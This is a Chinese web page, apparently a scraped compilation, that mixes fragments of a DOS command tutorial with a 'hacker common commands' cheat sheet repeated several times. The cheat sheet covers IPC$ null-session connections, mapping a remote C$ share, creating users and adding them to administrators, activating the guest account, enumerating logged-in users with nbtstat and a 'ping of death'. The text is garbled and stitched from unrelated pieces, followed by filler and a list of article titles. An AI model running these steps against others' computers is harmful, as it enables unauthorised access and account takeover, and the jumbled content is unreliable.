常用的内部命令有MD、CD、RD、DIR、PATH、COPY、TYPE、EDIT、REN、DEL、CLS、VER、DATE、TIME、PROMPT。 常用的外部命令有DELTREE、FORMA T、DISKCOPY、LABEL、VOL、SYS、XCOPY、FC、ATTRIB、MEM、TREE。 常用的内部命令详解 1.MD——建立子目录 功能:创建新的子目录 类型:内部命令ü 格式:MD[盘符:][路径名]〈子目录名〉 FOR 1: C:\>md y /*---建立y子目录---*/ 2.CD——改变当前目录 功能:显示当前目录ü 类型:内部命令ü 格式:CD[盘符:][路径名][子目录名] 说明:CD命令不能改变当前所在的盘,CD..退回到上一级目录,CD\表示返回到当前盘的目录下,CD无参数时显示当前目录名。 FOR 2: C:\>cd y /*---显示当前目录y---*/ 3.RD——删除子目录命令 功能:从指定的磁盘删除了目录。 微软Windos DOS 常用命令及远程操作 net use \\ip\ipc$ " " /user:" " 建立IPC空链接 net use \\ip\ipc$ "密码" /user:"用户名" 建立IPC非空链接 net use h: \\ip\c$ "密码" /user:"用户名" 直接登陆后映射对方C:到本地为H: net use h: \\ip\c$ 登陆后映射对方C:到本地为H: net use \\ip\ipc$ /del 删除IPC链接 net use h: /del 删除映射对方到本地的为H:的映射 net user 用户名密码/add 建立用户 net user guest /active:yes 激活guest用户 net user 查看有哪些用户 net user 帐户名查看帐户的属性 net localgroup administrators 用户名/add 把“用户”添加到管理员中使其具有管理员权限,注意:administrator后加s用复数 net start 查看开启了哪些服务 net start 服务名开启服务;(如:net start telnet,net start schedule) net stop 服务名停止某服务 net time \\目标ip 查看对方时间 net time \\目标ip /set 设置本地计算机时间与“目标IP”主机的时间同步,加上参数/yes可取消确认信息 net view 查看本地局域网内开启了哪些共享 net view \\ip 查看对方局域网内开启了哪些共享 net config 显示系统网络设置 net logoff 断开连接的共享 net pause 服务名暂停某服务 net send ip "文本信息" 向对方发信息 net ver 局域网内正在使用的网络连接类型和信息 net share 查看本地开启的共享 net share ipc$ 开启ipc$共享 net share ipc$ /del 删除ipc$共享 net share c$ /del 删除C:共享 net user guest 12345 用guest用户登陆后用将密码改为12345 net password 密码更改系统登陆密码 netstat -a 查看开启了哪些端口,常用netstat -an netstat -n 查看端口的网络连接情况,常用netstat -an netstat -v 查看正在进行的工作 netstat -p 协议名例:netstat -p tcq/ip 查看某协议使用情况(查看tcp/ip协议使用情况)netstat -s 查看正在使用的所有协议使用情况 nbtstat -A ip 对方136到139其中一个端口开了的话,就可查看对方最近登陆的用户名(03前的为用户名)-注意:参数-A要大写 tracert -参数ip(或计算机名) 跟踪路由(数据包),参数:“-w数字”用于设置超时间隔。ping ip(或域名) 向对方主机发送默认大小为32字节的数据,参数:“-l[空格]数据包大小”; cmd① net use ipipc$ " " /user:" " 建立IPC空链接 net use ipipc$ "密码" /user:"用户名" 建立IPC非空链接 net use h: ipc$ "密码" /user:"用户名" 直接登陆后映射对方C:到本地为H: net use h: ipc$ 登陆后映射对方C:到本地为H: net use ipipc$ /del 删除IPC链接 net use h: /del 删除映射对方到本地的为H:的映射 net user 用户名密码/add 建立用户 net user guest /active:yes 激活guest用户 net user 查看有哪些用户 net user 帐户名查看帐户的属性 net locaLGroup administrators 用户名 /add 把“用户”添加到管理员中使其具有管理员权限,注意:administrator后加s用复数 net start 查看开启了哪些服务 net start 服务名开启服务;(如:net start telnet, net start schedule) net stop 服务名停止某服务 net time 目标ip 查看对方时间 net time 目标ip /set 设置本地计算机时间与“目标IP”主机的时间同步,加上参数/yes 可取消确认信息 net view 查看本地局域网内开启了哪些共享 net view ip 查看对方局域网内开启了哪些共享 net config 显示系统网络设置 net logoff 断开连接的共享 net pause 服务名暂停某服务 net send ip "文本信息" 向对方发信息 net ver 局域网内正在使用的网络连接类型和信息 net share 查看本地开启的共享 net share ipc$ 开启ipc$共享 net share ipc$ /del 删除ipc$共享 net share c$ /del 删除C:共享 net user guest 12345 用guest用户登陆后用将密码改为12345 net password 密码更改系统登陆密码 netstat -a 查看开启了哪些端口,常用netstat -an netstat -n 查看端口的网络连接情况,常用netstat -an netstat -v 查看正在进行的工作 netstat -p 协议名例:netstat -p tcq/ip 查看某协议使用情况(查看tcp/ip协议使用情况) netstat -s 查看正在使用的所有协议使用情况 nBTstat -A ip 对方136到139其中一个端口开了的话,就可查看对方最近登陆的用户名(03前的为用户名)-注意:参数-A要大写 trAcert -参数 ip(或计算机名) 跟踪路由(数据包),参数:“-w数字”用于设置超时间隔。ping ip(或域名) 向对方主机发送默认大小为32字节的数据,参数:“-l[空格]数据包大小”;“-n发送数据次数”;“-t”指一直ping。 ping -t -l 65550 ip 死亡之ping(发送大于64K的文件并一直ping就成了死亡之ping) 黑客常用dos命令 (1)选用/P参数,系统在删除前询问是否真要删除该文件,若不使用这个参数,则自动删除; (2)该命令不能删除属性为隐含或只读的文件; (3)在文件名称中可以使用通配符; (4)若要删除磁盘上的所有文件(DEL*·*或DEL·),则会提示:(Arey ou sure?)(你确定吗?)若回答Y,则进行删除,回答N,则取消此次删除作业。 (八)UNDELETE——恢复删除命令 1.功能:恢复被误删除命令 2.类型:外部命令。 3.格式:UNDELETE[盘符:][路径名]〈文件名〉[/DOS]/LIST][/ALL] 4.使用说明:使用UNDELETE可以使用“*”和“?”通配符。 (1)选用/DOS参数根据目录里残留的记录来恢复文件。由于文件被删除时,目录所记载斩文件名第一个字符会被改为E5,DOS即依据文件开头的E5和其后续的字符来找到欲恢复的文件,所以,UNDELETE会要求用户输入一个字符,以便将文件名字补齐。但此字符不必和原来的一样,只需符合DOS的文件名规则即可。 (2)选用/LIST只“列出”符合指定条件的文件而不做恢复,所以对磁盘内容完全不会有影响。 (3)选用/ALL自动将可完全恢复的文件完全恢复,而不一一地询问用户,使用此参数时,若UNDELTE利用目录里残留的记录来将文件恢复,则会自动选一个字符将文件名补齐,并且使其不与现存文件名相同,选用字符的优选顺序为:#%——0000123456789A~Z。 UNDELETE还具有建立文件的防护措施的功能,已超出本课程授课范围,请读者在使用些功能时查阅有关DOS手册。 七、其它命令 (一)CLS——清屏幕命令 1功能:清除屏幕上的所有显示,光标置于屏幕左上角。 2类型:内部命令 d os命令大全黑客必知的DOS命令集合_DOS/BAT 各位读友大家好!你有你的木棉,我有我的文章,为了你的木棉,应读我的文章!若为比翼双飞鸟,定是人间有情人!若读此篇优秀文,必成天上比翼鸟! dos命令大全黑客必知的DOS命令集合_DOS/BATnet use ipipc$ ““ /user:””建立IPC空链接net use ipipc$ “密码”/user:”用户名”建立IPC非空链接net use h: ipc$ “密码” /user:”用户名”直接登陆后映射对方C :到本地为H:net use h: ipc$登陆后映射对方C :到本地为H:net use ipipc$ /del删除IPC链接net use h: /del删除映射对方到本地的为H:的映射net user用户名密码/add 建立用户net user guest /active:yes激活guest用户net user查看有哪些用户net user帐户名查看帐户的属性net locaLGroup administrators用户名/add把”用户”添加到管理员中使其具有管理员权限注意: administrator后加s用复数net start查看开启了哪些服务net start 服务名开启服务; (如:net start telnet,net start schedule)net stop服务名停止某服务net time目标ip查看对方时间net time目标ip /set 设置本地计算机时间与目标IP”主机的时间同步加上参数/yes可取消确认信息net view查看本地局域网内开启了哪些共享net view ip查看对方局域网内开启了哪些共享net config显示系统网络设置net logoff断开连接的共享net pause服务名暂停某服务net send ip “文本信息”向对方发信息net ver局域网内正在使用的网络连接类型和信息net share查看本地开启的共享net share ipc$开cmd常用命令大全
黑客术语大全
黑客常用CMD命令大全
黑客常用的远程控制命令
黑客常用命令大全
黑客DOS命令或其它命令入侵他人电脑的具体步骤
[dos命令大全 原创]之Diskcomp 命令详解
常用DOS命令大全及其用法详解
黑客必懂常用的10个dos命令
初识DOS、DOS技巧&黑客常用DOS命令之详解(详细通俗易懂篇)
史上最全的局域网dos命令集
实训1、常用Windows网络安全命令
电脑系统(DOS命令大全
[黑客入门知识] 微软Windos DOS 常用命令及远程操作
[计算机应用百科TXT]黑客DOS命令大全
黑客常用dos命令
dos命令大全黑客必知的DOS命令集合_DOS-BAT